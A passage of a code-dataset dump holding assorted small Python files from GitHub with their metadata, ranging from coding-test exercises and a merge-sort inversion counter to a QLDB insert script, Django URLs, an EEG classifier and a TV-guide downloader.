loop to continue checking the next number\n","repo_name":"ciwen3/Public","sub_path":"Python/Prime-Counter/ready/countingprimeswithpython.py","file_name":"countingprimeswithpython.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"22276646236","text":"N = int(input())\n\nfor i in range(N):\n sum = i\n numlist = list(str(i))\n for num in numlist:\n sum += int(num)\n if sum == N:\n print(i)\n break\nelse:\n print(0)","repo_name":"cheon4050/CodingTest-Study","sub_path":"02주차/2231/kodongcheon.py","file_name":"kodongcheon.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32940930580","text":"from logging import basicConfig, getLogger, INFO\nfrom sampledata.input_data import SampleData\nfrom constants import Constants\nfrom sampledata.sample_data import convert_object_to_ion, get_document_ids_from_dml_results\nfrom connect_to_ledger import create_qldb_driver\n\nlogger = getLogger(__name__)\nbasicConfig(level=INFO)\n\n\ndef update_person_id(document_id):\n \"\"\"\n Update the PersonId value for DriversLicense records and the PrimaryOwner value for VehicleRegistration records.\n :type document_ids: list\n :param document_ids: List of document IDs.\n :rtype: list\n :return: Lists of updated DriversLicense records and updated VehicleRegistration records.\n \"\"\"\n new_sc_entity = SampleData.SCENTITY.copy()\n \n new_sc_entity[0][\"PersonIds\"].append(document_id)\n # logger.info(new_sc_entity)\n return new_sc_entity\n\ndef insert_documents(transaction_executor, table_name, documents):\n \"\"\"\n Insert the given list of documents into a table in a single transaction.\n :type transaction_executor: :py:class:`pyqldb.execution.executor.Executor`\n :param transaction_executor: An Executor object allowing for execution of statements within a transaction.\n :type table_name: str\n :param table_name: Name of the table to insert documents into.\n :type documents: list\n :param documents: List of documents to insert.\n :rtype: list\n :return: List of documents IDs for the newly inserted documents.\n \"\"\"\n # logger.info('Inserting some documents in the {} table...'.format(table_name))\n statement = 'INSERT INTO {} ?'.format(table_name)\n cursor = transaction_executor.execute_statement(statement, convert_object_to_ion(documents))\n list_of_document_ids = get_document_ids_from_dml_results(cursor)\n \n return list_of_document_ids\n\n\ndef update_and_insert_documents(transaction_executor):\n \"\"\"\n Handle the insertion of documents and updating PersonIds all in a single transaction.\n :type transaction_executor: :py:class:`pyqldb.execution.executor.Executor`\n :param transaction_executor: An Executor object allowing for execution of statements within a transaction.\n \"\"\"\n admin_id = insert_documents(transaction_executor, Constants.PERSON_TABLE_NAME, SampleData.PERSON)\n\n logger.info(\"Updating PersonIds for 'SCENTITY' ...\")\n new_sc_entity = update_person_id(admin_id[0])\n\n mcg_id = insert_documents(transaction_executor, Constants.SCENTITY_TABLE_NAME, new_sc_entity)\n\n return admin_id[0], mcg_id[0]\n \n \n\nif __name__ == '__main__':\n \"\"\"\n Insert documents into a table in a QLDB ledger.\n \"\"\"\n try:\n with create_qldb_driver() as driver:\n # An INSERT statement creates the initial revision of a document with a version number of zero.\n # QLDB also assigns a unique document identifier in GUID format as part of the metadata.\n driver.execute_lambda(lambda executor: update_and_insert_documents(executor),\n lambda retry_attempt: logger.info('Retrying due to OCC conflict...'))\n logger.info('Documents inserted successfully!')\n except Exception:\n logger.exception('Error inserting or updating documents.')\n","repo_name":"anadi2311/MCG_QLDB","sub_path":"src/insert_document.py","file_name":"insert_document.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"22503103982","text":"\"\"\"\nThe linecache module allows one to get any line from a Python source file, while attempting to optimize internally,\n using a cache, the common case where many lines are read from a single file. This is used by the traceback module\n to retrieve source lines for inclusion in the formatted traceback.\n\"\"\"\nimport linecache\n\nfile = r\"C:\\Users\\20106\\PycharmProjects\\intermediate-python3\\Files and Paths Modules\\testes\\linecash.txt\"\n\nline = linecache.getline(filename=file, lineno=10)\n\nprint(line)\n\nlinecache.checkcache(filename=file)\n","repo_name":"mo-a1/intermediate-python3","sub_path":"Python Standard Library/File and Directory Access/linecash_module.py","file_name":"linecash_module.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38062671925","text":"import matplotlib.pyplot as Matplot\nimport numpy as np\nimport os\nimport neuralNetwork as nn\n\n\n\ndef testAccuracy(y_pred, y_actual):\n accuracy =np.sum(y_actual==y_pred)/len(y_actual)\n return accuracy\n\ndef logLoss(pred, label):\n epsilon = 1e-15\n pred = np.clip(pred, epsilon, 1 - epsilon)\n i=0\n i=(-label*np.log(pred) - (1-label)*np.log(1-pred))\n return i\n\ndef plotErrors(l):\n Matplot.plot(l, [x for x in range(len(l))])\n Matplot.xlabel('iterations')\n Matplot.ylabel('logloss')\n Matplot.title('error')\n\n Matplot.show()\n\n return\n\ndef visualData(mat,ylist, perceptron):\n \n fig = Matplot.figure()\n ax = fig.add_subplot(1, 1, 1)\n Matplot.scatter(mat[:, 0], mat[:, 1], marker=\"o\", c=ylist)\n\n x0_1 = np.amin(mat[:, 0])\n x0_2 = np.amax(mat[:, 0])\n\n x1_1 = (-perceptron.weights[0] * x0_1 - perceptron.bias) / perceptron.weights[1]\n x1_2 = (-perceptron.weights[0] * x0_2 - perceptron.bias) / perceptron.weights[1]\n\n ax.plot([x0_1, x0_2], [x1_1, x1_2], \"k\")\n\n ymin = np.amin(mat[:, 1])\n ymax = np.amax(mat[:, 1])\n ax.set_ylim([ymin - 3, ymax + 3])\n\n Matplot.xlabel('meep')\n Matplot.ylabel('morp')\n Matplot.title('Data')\n\n Matplot.show()\n\n\n return \n\ndef makePoints(l):\n ret=[]\n for x in l:\n x_c=0\n y_c=0\n s=x.split(\" \")\n for i in s:\n if i==\"meep\":\n x_c+=1\n elif i==\"morp\":\n y_c+=1\n ret.append([x_c,y_c])\n ret= np.array(ret)\n \n return ret\n\n\ndef dataParser(dataFile):\n dataList=[]\n with open(dataFile,\"r\", encoding=\"utf-8\") as f:\n for line in f:\n l=line.split(\" 00\")\n l[1]=l[1].strip(\"\\n\")\n dataList.append(l)\n return dataList\n\ndef unlabelData(l):\n unLabeled= [x[0] for x in l]\n normalizedLabel=np.array([0 if x[1]== \"sad\" else 1 for x in l])\n return unLabeled, normalizedLabel\n\ndef showData(data,labels):\n fig = Matplot.figure()\n ax = fig.add_subplot(1, 1, 1)\n data=np.array(data)\n Matplot.scatter(data[:, 0], data[:, 1], marker=\"o\", c=labels)\n Matplot.xlabel('meep')\n Matplot.ylabel('morp')\n Matplot.title('Data')\n\n Matplot.show()\n\n\n return\n\n\n\ndef main():\n #data uploading and parsing from alienGen.py \n trainDataList, trainLabelList = unlabelData(dataParser(os.path.join(os.getcwd(),\"ForwardPassNN\\data\\dataBatch1.txt\")))\n\n testDataList, testLabelList= unlabelData(dataParser(os.path.join(os.getcwd(),\"ForwardPassNN\\data\\dataBatch.txt\")))\n\n trainData= makePoints(trainDataList)\n\n testData= makePoints(testDataList)\n\n #init network\n Fn= nn.FeedForwardNN(2,[2,1])\n\n #plot data\n showData(trainData,trainLabelList)\n\n #training\n tup=Fn.train([trainData,trainLabelList])\n\n predictions= Fn.predict(testData)[0]\n \n #accuracy testing\n accuracy=testAccuracy(nn.sigmoid_step(predictions),testLabelList)\n \n print(tup)\n print(accuracy)\n #print(predictions[-10:-1])\n \n\n #visualData(trainData, trainLabelList, Lp)\n #plotErrors(Fn.error)\n \n return \"done\"\n\nprint(main())","repo_name":"Di0nigi/DeepLearningClass","sub_path":"ForwardPassNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70570612200","text":"# Exam Preparation\r\n\r\n# ⦁\tНа първи ред - брой незадоволителни оценки - цяло число;\r\n# ⦁\tСлед това многократно се четат по два реда:\r\n# ⦁\tИме на задача – текст;\r\n# ⦁\tОценка - цяло число в интервала [2…6]\r\n\r\nlow_marks_count = int(input())\r\ninitial_low_marks = low_marks_count\r\nmarks_sum = 0\r\nmarks_count = 0\r\nis_enough_tasks = False\r\nis_low_marks_reached = False\r\ncurrent_task_name = None\r\n\r\ntask_name = input()\r\nwhile not is_enough_tasks:\r\n\r\n if task_name == \"Enough\":\r\n is_enough_tasks = True\r\n continue\r\n\r\n current_task_name = task_name\r\n current_mark = int(input())\r\n\r\n if current_mark <= 4:\r\n low_marks_count -= 1\r\n if low_marks_count == 0:\r\n is_low_marks_reached = True\r\n break\r\n\r\n marks_sum += current_mark\r\n marks_count += 1\r\n task_name = input()\r\n\r\nif is_enough_tasks:\r\n print(f\"Average score: {marks_sum / marks_count :.2f}\")\r\n print(f\"Number of problems: {marks_count}\")\r\n print(f\"Last problem: {current_task_name}\")\r\nelif is_low_marks_reached:\r\n print(f\"You need a break, {initial_low_marks} poor grades.\")\r\n","repo_name":"pySin/SoftUni-Software-Engineering","sub_path":"Python-Programming-Basics/while-loop/exam_preparation.py","file_name":"exam_preparation.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30320007094","text":"#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\n\nimport web\nimport os\nimport sys\n\nif not u'../' in sys.path:\n sys.path.append(u'../')\n\nfrom control import *\n\nurls = (\n u'/', u'index', # スレッド一覧表示\n u'/thread', u'mythread', # スレッド作成\n u'/res', u'res', # レス作成、表示\n u'/error', u'error', # エラー表示\n u'/(.*)', u'index', # 条件に合わないものはスレッド一覧表示\n )\n\ndef main():\n app = web.application(urls, globals())\n app.run()\n\n\nif __name__ == u'__main__':\n main()\n","repo_name":"GunioRobot/learning-web.py","sub_path":"test03/web/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"37981363889","text":"def mergesort(arr):\n\n return mergeSort(arr,0,len(arr)-1) #recursion function\n\ndef mergeSort(arr,low,high):\n \n if low >= high: #base condition for recursion\n return 0\n \n mid = (low+high)//2\n # print(mid,'mid')\n left_data = mergeSort(arr,low,mid) #partion of left data and count the inversion upto mid point\n # print(\"left_data \",left_data)\n right_data = mergeSort(arr,mid+1,high) #partion of right data and count the inverison upto right point\n # print(\"right_data \",right_data)\n merge_both = merge(arr,low,mid,high) #merge both merge points\n # print(\"both \",merge_both)\n\n total_count = left_data + right_data + merge_both\n\n return total_count \n\n\ndef merge(arr,low,mid,high):\n i = low #low part\n j = mid+1 #low part for right parition\n k = 0 #k id 0 for temp array lengh\n count = 0\n temp = [0 for i in range(high-low+1)] #make a temp array for put the both merge data\n print(i,j,mid,len(temp))\n\n while i <= mid and j <= high:\n # print(i,j,'ij')\n if arr[i] < arr[j]: #if left data is less than put into temp\n temp[k] = arr[i]\n i += 1\n k += 1\n # print(temp,'temp1')\n else:\n temp[k] = arr[j] #if right data is less than put into temp\n j += 1\n print(mid,i) \n count += mid -i +1 #because inversion happen when right array data move to first so \n k += 1\n # print(temp,'temp2')\n \n \n while i <= mid: #bache hue element dal do temp m \n temp[k] = arr[i]\n i += 1\n k += 1\n # print(temp,'temp1')\n \n while j <= high:\n temp[k] = arr[j]\n j += 1\n k += 1\n # print(temp,'temp2')\n \n print(temp,count,low,high)\n # Copy the sorted subarray into Original array\n k = 0\n for z in range(low,high+1):\n arr[z] = temp[k]\n k += 1\n\n \n # print(arr)\n\n \n return count\n\narr = [1, 20, 6, 4, 5] #[4, 2, 1,3] #[3,8]\n#arr = [3, 8, 6, 4, 2, 1]\nmergesort(arr)\n","repo_name":"aviTak/dsa-interview-prep","sub_path":"Arrays/Count Inversion/countinversion.py","file_name":"countinversion.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23906557509","text":"#------------------- combinatorial.py -------------------#\nfrom operator import mul, add, truth\napply_each = lambda fns, args=[]: map(apply, fns, [args]*len(fns))\nbools = lambda lst: map(truth, lst)\nbool_each = lambda fns, args=[]: bools(apply_each(fns, args))\nconjoin = lambda fns, args=[]: reduce(mul, bool_each(fns, args))\nall = lambda fns: lambda arg, fns=fns: conjoin(fns, (arg,))\nboth = lambda f,g: all((f,g))\nall3 = lambda f,g,h: all((f,g,h))\nand_ = lambda f,g: lambda x, f=f, g=g: f(x) and g(x)\ndisjoin = lambda fns, args=[]: reduce(add, bool_each(fns, args))\nsome = lambda fns: lambda arg, fns=fns: disjoin(fns, (arg,))\neither = lambda f,g: some((f,g))\nanyof3 = lambda f,g,h: some((f,g,h))\ncompose = lambda f,g: lambda x, f=f, g=g: f(g(x))\ncompose3 = lambda f,g,h: lambda x, f=f, g=g, h=h: f(g(h(x)))\nident = lambda x: x\n","repo_name":"toocheap/python-samples","sub_path":"combinatorial.py","file_name":"combinatorial.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"74016549481","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: Duo\nimport pickle\n\ndef greeting(name):\n print(\"hi %s\"%name)\n\ninfo = {\n 'name' : 'Duo Zhang',\n 'age':27,\n 'school':'Marquette',\n 'func':greeting\n}\n# pickle 写进去的是 Binary 类型 二进制 所以要 用 wb write binary\nf = open('test2.txt','wb')\n\n# pickle 的 dump 可以直接 需要写入的 (字典列表等等,读进来的文件)\n# dump obj+文件名 可直接写入\npickle.dump(info,f)\n# dumps 命令需要调用f.write来写入\n# f.write(pickle.dumps(info))\nf.close()","repo_name":"AlexDuo/DuoPython","sub_path":"Decorator/Pickle_Serialization2.py","file_name":"Pickle_Serialization2.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73478948521","text":"from django.contrib import admin\nfrom django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom power import views\nfrom drf_spectacular.views import (\n SpectacularAPIView,\n SpectacularRedocView,\n SpectacularSwaggerView,\n)\n\ndetail_actions = {\n \"get\": \"retrieve\",\n \"put\": \"update\",\n \"delete\": \"destroy\",\n \"patch\": \"partial_update\",\n}\n\nlist_actions = {\n \"get\": \"list\",\n \"post\": \"create\",\n}\n\nurlpatterns = [\n path(\"api/schema/\", SpectacularAPIView.as_view(), name=\"schema\"),\n path(\"\", SpectacularSwaggerView.as_view(url_name=\"schema\"), name=\"swagger-ui\"),\n path(\"redoc/\", SpectacularRedocView.as_view(url_name=\"schema\"), name=\"redoc\"),\n path(\"boats/\", views.BoatViewSet.as_view(actions=list_actions)),\n path(\n \"boats//\",\n views.BoatViewSet.as_view(actions=detail_actions),\n ),\n path(\n \"engines/\",\n views.EngineViewSet.as_view(actions=list_actions),\n ),\n path(\n \"engines//\",\n views.EngineViewSet.as_view(actions=detail_actions),\n ),\n path(\n \"boatengines/\",\n views.BoatEngineViewSet.as_view(actions=list_actions),\n ),\n path(\n \"boatengines//\",\n views.BoatEngineViewSet.as_view(actions=detail_actions),\n ),\n path(\"admin/\", admin.site.urls),\n]\nurlpatterns = format_suffix_patterns(urlpatterns)\n","repo_name":"RobertBush/marina","sub_path":"marina/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12861089405","text":"import sys\n\nfrom classes.workExperience import WorkExperience\nfrom classes.skillCategory import SkillCategory\nfrom classes.imageCategory import ImageCategory\nfrom classes.education import Education\nfrom classes.other import Other\nfrom classes.userData import UserData\n\nclass Controller:\n collection = None\n exitNumber = 7\n\n def __init__(self, database):\n self.database = database\n\n def pickCollection(self, option):\n if option == 1:\n if not isinstance(self.collection, WorkExperience):\n self.collection = WorkExperience('Work Experience', 'experiences', self.database)\n self.collection.showOptions()\n elif option == 2:\n if not isinstance(self.collection, SkillCategory):\n self.collection = SkillCategory('Skill Categories', 'skillcategories', self.database)\n self.collection.showOptions()\n elif option == 3:\n if not isinstance(self.collection, ImageCategory):\n self.collection = ImageCategory('Image Categories', 'imagecategories', self.database)\n self.collection.showOptions()\n elif option == 4:\n if not isinstance(self.collection, Education):\n self.collection = Education('Education', 'educations', self.database)\n self.collection.showOptions()\n elif option == 5:\n if not isinstance(self.collection, Other):\n self.collection = Other('Other', 'others', self.database)\n self.collection.showOptions()\n elif option == 6:\n if not isinstance(self.collection, UserData):\n self.collection = UserData('User Data', 'userdatas', self.database)\n self.collection.showOptions()\n elif option == self.exitNumber:\n print(\"Exiting...\")\n sys.exit()\n else:\n print(\"\\nERROR : Invalid option.\")\n \n def showMenu(self):\n print(\"\\nWhat collection you want to work with today?\\n\")\n print(\"1. Work Experiences.\")\n print(\"2. Skills Categories.\")\n print(\"3. Image Categories.\")\n print(\"4. Education.\")\n print(\"5. Other.\")\n print(\"6. User Data.\")\n print(\"{}. Exit program.\".format(self.exitNumber))\n\n\n\n\n\n","repo_name":"Vinesma/portfolio-website-v2","sub_path":"dbHelper/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42235854433","text":"# -*- coding:utf-8 -*-\nimport numpy as np\nfrom keras.utils import to_categorical\nfrom keras.layers import Conv1D, GRU, GlobalAveragePooling1D, Activation, Flatten, Dropout, Dense, MaxPool1D\nfrom keras.models import Sequential\nimport scipy.io\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import StratifiedKFold, train_test_split\nmin_max_scaler = preprocessing.MinMaxScaler()\ndata_all = scipy.io.loadmat('C1.mat')['data'].reshape(3600,992)\ndf_all = min_max_scaler.fit_transform(data_all)\nlabel = scipy.io.loadmat('df_label.mat')['label'].reshape(-1)\ndf_all = df_all.reshape(3600,16,62)\n'''\n#��用随机选取测试训练集\nindex=np.ones(3600)\nfor i in range(3600):\n index[i]=i\nnp.random.shuffle(index)\nindex=index.astype('int64')\nindex_train=index[0:2800]\nindex_test=index[2800:]\n\nx_total = df_all[index_train]\ny_total = label[index_train]\n\nx_test = df_all[index_test]\ny_test = label[index_test]\n\nx_train, x_valid, y_train, y_valid = train_test_split(x_total, y_total, test_size = 0.2, random_state = 1)\n\ny_train = to_categorical(y_train, num_classes = 3)\ny_test = to_categorical(y_test, num_classes = 3)\ny_valid = to_categorical(y_valid, num_classes = 3)\n'''\n#采用五折验证的方式\nfor index_train, index_test in skf.split(df_all, label):\n \n #计时开始\n start = time.clock()\n \n x_total = df_all[index_train]\n x_test = df_all[index_test]\n y_total = label[index_train]\n y_test = label[index_test]\n \n print('x_train shape:', data.shape)\n print(x_total.shape[0], 'train samples')\n print(x_test.shape[0], 'test samples')\n \n x_train, x_valid, y_train, y_valid = train_test_split(x_total, y_total, test_size = 0.1, random_state = 1)\n\n y_test = np.expand_dims(y_test, axis = 1)\n y_test = to_categorical(y_test, num_classes = 3)\n y_train = to_categorical(y_train, num_classes = 3)\n y_valid1 = np.expand_dims(y_valid, axis = 1)\n y_valid3 = to_categorical(y_valid, num_classes = 3)\n\n\n#搭建一个CRR接GRU的网络\n'''\nmodel = Sequential()#对模型进行线性连接\nmodel.add(Conv1D(256, 3, input_shape=(16,62))) #添加一维卷积层\nmodel.add(Activation('relu'))\nmodel.add(MaxPool1D(pool_size=2))\nmodel.add(GRU(256, dropout=0.2, recurrent_dropout=0.1, return_sequences=True))#卷积后接循环神经网络\nmodel.add(GRU(256, dropout=0.2, recurrent_dropout=0.1))\nmodel.add(Dense(3))\nmodel.add(Activation('sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='RMSprop', metrics=['accuracy'])\n'''\n\n#搭建一个一维卷积网络\nmodel_m = Sequential()\nmodel_m.add(Conv1D(100, 3, activation='relu', input_shape=(16,62)))\n#model_m.add(Conv1D(100, 3, activation='relu'))\nmodel_m.add(MaxPool1D(2))\nmodel_m.add(Conv1D(160, 3, activation='relu'))\n#model_m.add(Conv1D(160, 1, activation='relu'))\nmodel_m.add(GlobalAveragePooling1D())\nmodel_m.add(Dropout(0.5))\nmodel_m.add(Dense(3, activation='softmax'))\nmodel_m.compile(loss='binary_crossentropy', optimizer='RMSprop', metrics=['accuracy'])\n\n\nscore1=np.ones(2)\nfor epoch in range(30):\n print('epoch:',epoch+1)\n model_m.fit(x_train, y_train, batch_size=10, epochs=2,verbose=1,\n validation_data=(x_valid,y_valid3))\n #model.fit(x_train, y_train, batch_size=10, epochs=2,verbose=0,\n #validation_data=(x_valid,y_valid3))\n score = model_m.evaluate(x_test, y_test, batch_size=10)\n print(score)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Song-zhenzhen/EEG_emotion_classification_use_CNN-and-RNN","sub_path":"CNN+RNN.py","file_name":"CNN+RNN.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"18"} +{"seq_id":"29670552397","text":"import torch\nimport numpy as np \nfrom torch.utils.data import Dataset, DataLoader\nfrom pycocotools.coco import COCO\nimport cv2\n\nclass dataset(Dataset):\n def __init__(self, image_folder, annotation_file):\n self.images = image_folder\n self.annotations = annotation_file\n\n self.coco = COCO(self.annotations)\n self.catId = self.coco.getCatIds(catNms = ['person'])\n\n self.imgIds = self.coco.getImgIds(catIds = self.catId)\n \n def __len__(self):\n return len(self.imgIds)\n\n def __getitem__(self, id):\n # print('yahan baar baar nahi aana chahiye')\n print(self.imgIds[id])\n img = self.coco.loadImgs(self.imgIds[id])[0]\n img_name = img['file_name']\n # print(img_name)\n X = np.array(cv2.imread(self.images + str(img_name)))\n height = X.shape[0]\n width = X.shape[1]\n # print(height, width)\n X = cv2.resize(X,(224, 224))\n # print(X.shape)\n X = X.transpose([2,0,1])\n annIds = self.coco.getAnnIds(imgIds=img['id'], catIds=self.catId, iscrowd=None)\n anns = self.coco.loadAnns(annIds)\n y = anns[0]['keypoints']\n y = np.array(y)\n # print(y)\n for i in range(17):\n y[3*i] = 224*1.0/width * y[3*i]\n y[3*i + 1] = 224*1.0/height * y[3*i + 1]\n # print(y)\n return X, y\ndata_train = dataset('coco/images/', 'coco/annotations/person_keypoints_train2014.json')\ntrain_loader = DataLoader(data_train, batch_size = 8, shuffle = True)\nprint(len(train_loader))\ndata_train.__getitem__(5)\n\n\n ","repo_name":"agarwalsiddhant10/torch-models","sub_path":"keypoint_detection/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25008655968","text":"from django.db import models\nfrom datetime import datetime\nimport json\n\n# Create your models here.\n\nclass Camera(models.Model):\n statusTemplate = {\n \"summary\": \"notfound\", # one of \"notfound\", \"off\", \"on\", or \"recording\"\n \"raw\": {}\n }\n name = models.CharField(max_length=255)\n ssid = models.CharField(max_length=255)\n password = models.CharField(max_length=255)\n date_added = models.DateTimeField(auto_now_add=True)\n last_attempt = models.DateTimeField(auto_now=True) \n last_update = models.DateTimeField(null=True, blank=True)\n image = models.TextField(blank=True)\n status = models.TextField(blank=True) # status template above is defined by GoProController.py\n def save(self, *args, **kwargs):\n if not self.pk:\n self.status = json.dumps(self.statusTemplate)\n self.last_attempt = datetime(2002, 6, 1) # what's this date?! ;)\n super(Camera, self).save(*args, **kwargs)\n else:\n super(Camera, self).save(*args, **kwargs)\n def __unicode__(self):\n return self.name\n\nclass CameraCommand(models.Model):\n COMMANDS = (\n ('power_off', 'Power Off'),\n ('power_on', 'Power On'),\n ('record_off', 'Record Off'),\n ('record_on', 'Record On'),\n ('mode_video', 'Mode Video'),\n ('mode_still', 'Mode Still'),\n )\n camera = models.ForeignKey(Camera)\n command = models.CharField(max_length=255, choices=COMMANDS) # command list above is defined by GoProController.py\n date_added = models.DateTimeField(auto_now_add=True)\n time_completed = models.DateTimeField(null=True, blank=True)\n def __unicode__(self):\n return self.camera.__unicode__() + ' > ' + self.command\n","repo_name":"lolchocotaco/GoPi","sub_path":"GoProSite/GoProApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"25108339220","text":"import guide_data\nimport qboottimer\n\nimport sys\nimport pyschedules.retrieve\nimport threading\nimport signal\nimport shutil\nimport StringIO\n\nimport datetime\nimport dateutil.tz\nimport atomicwrites\nimport multiprocessing\n\nfrom PyQt4 import Qt\n\nlocaltz = dateutil.tz.tzlocal()\n#multiprocessing.set_start_method('spawn')\n\ndef process_run(tmp, result):\n result.put(guide_data.guide_data(tmp))\n\nclass parse_worker(Qt.QThread):\n done = Qt.pyqtSignal(guide_data.guide_data)\n failed = Qt.pyqtSignal()\n\n def __init__(self, filename):\n super(parse_worker, self).__init__()\n self.filename = filename\n\n def start(self, fileobj, initial=False):\n self.fobj = fileobj\n self.initial = initial\n super(parse_worker, self).start(Qt.QThread.IdlePriority)\n\n def run(self):\n try:\n tmp = StringIO.StringIO()\n shutil.copyfileobj(self.fobj, tmp)\n tmp.seek(0)\n result = multiprocessing.Queue()\n p = multiprocessing.Process(target=process_run, args=(tmp, result))\n p.start()\n d = result.get()\n p.join()\n self.done.emit(d)\n if not self.initial:\n tmp.seek(0)\n try:\n with atomicwrites.atomic_write(self.filename, overwrite=True) as out:\n shutil.copyfileobj(tmp, out)\n except:\n pass\n except:\n self.failed.emit()\n finally:\n del self.fobj\n\nclass retrieve_worker(Qt.QThread):\n done = Qt.pyqtSignal(object)\n failed = Qt.pyqtSignal()\n\n def __init__(self, login, duration):\n super(retrieve_worker, self).__init__()\n self.login = login\n self.duration = duration\n\n def run(self):\n try:\n utc_start = datetime.datetime.utcnow()\n utc_stop = utc_start + self.duration\n u, p = self.login\n f = pyschedules.retrieve.get_file_object(u, p, utc_start, utc_stop)\n self.done.emit(f)\n except:\n self.failed.emit()\n\nclass guide_manager(Qt.QObject):\n new_guide = Qt.pyqtSignal(guide_data.guide_data)\n\n def __init__(self, parent, options=None):\n super(guide_manager, self).__init__(parent)\n self.first = True\n\n self.minimum_sched = datetime.timedelta(hours=8)\n self.minimum_fresh = datetime.timedelta(days=1)\n fetch_duration = datetime.timedelta(days=2)\n\n self.filename = options.sched\n self.parse = parse_worker(self.filename)\n self.retrieve = retrieve_worker((options.username, options.password), fetch_duration)\n\n self.parse.done.connect(self.parse_done)\n self.parse.done.connect(self.new_guide)\n self.parse.failed.connect(self.parse_failed)\n self.retrieve.done.connect(self.parse.start)\n self.retrieve.failed.connect(self.retrieve_failed)\n\n self.timer = qboottimer.QBootTimer()\n self.timer.setSingleShot(True)\n self.timer.timeout.connect(self.retrieve.start)\n\n Qt.QTimer.singleShot(0, self.parse_first)\n\n def retrieve_failed(self):\n # Wait 5 minutes and try again\n self.timer.start(5 * 60 * 1000)\n\n def parse_first(self):\n try:\n self.parse.start(open(self.filename, 'r'), True)\n except:\n self.parse_failed()\n\n def parse_done(self, f):\n now = datetime.datetime.now(localtz)\n\n # We need at least minimum_sched time of schedule data from now till validTo\n update_time = f.validTo - self.minimum_sched\n minimum_sched_wait = update_time - now\n\n # Schedule data should have been fetched in the past minimum_fresh time\n update_time = f.validFrom + self.minimum_fresh\n fresh_wait = update_time - now\n\n wait = min(minimum_sched_wait, fresh_wait)\n if wait.total_seconds() < 0:\n self.retrieve.start()\n else:\n self.timer.start(wait.total_seconds() * 1000)\n\n def parse_failed(self):\n if self.first:\n self.first = False\n self.retrieve.start(Qt.QThread.IdlePriority)\n else:\n # Wait 5 minutes and try again\n self.timer.start(5 * 60 * 1000)\n","repo_name":"russdill/atropine-tv","sub_path":"guide_manager.py","file_name":"guide_manager.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7535911705","text":"languages = {}\n\nwith open(\"../../../Examples/students.txt\", 'r') as f:\n for line in f:\n line = line.rstrip()\n student, lingos = line.split(\":\")\n lingos = lingos.strip()\n for l in lingos.split(\" \"):\n if l == '':\n continue\n if l in languages:\n languages[l] += 1\n else:\n languages[l] = 1\n\nindex = list(languages.keys())\nindex.sort()\n\nfor i in index:\n print(\"{} : {}\".format(i, languages[i]))\n","repo_name":"HasBob/IntroPython2015","sub_path":"students/iancote/session04/files_lab.py","file_name":"files_lab.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26393798840","text":"import numpy as np\nimport pandas as pd\nimport requests\nfrom io import BytesIO\nfrom datetime import datetime\n\nimport os\nimport random\nfrom back.image_manager import TextImage\n\ndow = [\"Пн\", \"Вт\", \"Ср\", \"Чт\", \"Пт\", \"Сб\", \"Вс\"]\nsf_pairs = [\"900-1030\", \"1040-1210\", \"1240-1410\", \"1420-1550\", \"1620-1750\", \"1800-1930\"]\nstart_date = \"07.02.2022\"\n\ntoday_dow = dow[datetime.now().weekday()]\n\n\ndef get_table(\n CACHED_TABLE_PATH: str = None,\n CACHED_TABLE_NAME: str = None,\n DOWNLOAD_LINK: str = None,\n):\n def download_table(DOWNLOAD_LINK):\n responce = requests.get(DOWNLOAD_LINK)\n with BytesIO(responce.content) as bytes_table:\n # Unnamed:0 - index, we don`t need it\n return pd.io.excel.read_excel(bytes_table).drop(\"Unnamed: 0\", axis=1)\n\n def get_cached_table(CACHED_TABLE_PATH, CACHED_TABLE_NAME):\n return 